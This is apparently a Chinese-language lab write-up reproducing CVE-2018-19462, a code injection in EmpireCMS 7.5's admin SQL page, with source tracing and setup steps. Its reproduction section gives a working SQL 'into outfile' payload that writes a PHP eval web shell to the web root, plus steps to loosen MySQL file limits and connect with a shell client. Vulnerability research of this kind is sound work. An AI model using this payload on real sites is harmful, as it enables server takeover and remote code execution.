【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462)

0x00漏洞描述

EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。

0x01影响版本

EmpireCMS<=7.5

0x02环境搭建

1、官方下载EmpireCMS V7.5 下载地址:http://www.phome.net/download/

2、把下载的文件中的upload下的所有目录和文件放入到网站根目录下

3、修改php.ini配置文件, PHP环境中必须开启短标签,不然安装会提示无法安装

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第1张

4、设置php.inishort_open_tag = On,重启phpstudy

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第2张

0x03 漏洞复现

1. 漏洞出现在

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第3张

2. 分析源码定位漏洞出现的位置在/e/admin/db/DoSql.php,浏览代码,sqltext使用RepSqlTbpre函数进行处理

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第4张

3、跟进RepSqlTbpre函数,发现仅仅对表的前缀做替换,没有做其他任何处理 

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第5张

4、继续浏览代码,发现对$query使用DoRunQuery函数进行处理

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第6张

5、跟进DoRunQuery函数,可以看到对$sql参数只做了去除空格、以”;”分隔然后遍历,并你没有做别的限制和过滤,导致可以执行恶意的sql语句

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第7张

6、登录后台,点击如下,输入一段写shellpayload,payload内容如下:select '<?php @eval($_POST[cxk])?>' into outfile 'C:/phpStudy/WWW/shell.php'

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第8张

7. 执行错误 请配置mysql 添加secure_file_priv =并重启

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第9张

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第10张

8. 再次执行SQL语句

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第11张

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第12张

9. 菜刀连接GetShell

【漏洞复现】帝国CMS(EmpireCMS) v7.5 代码注入分析(CVE-2018-19462) 第13张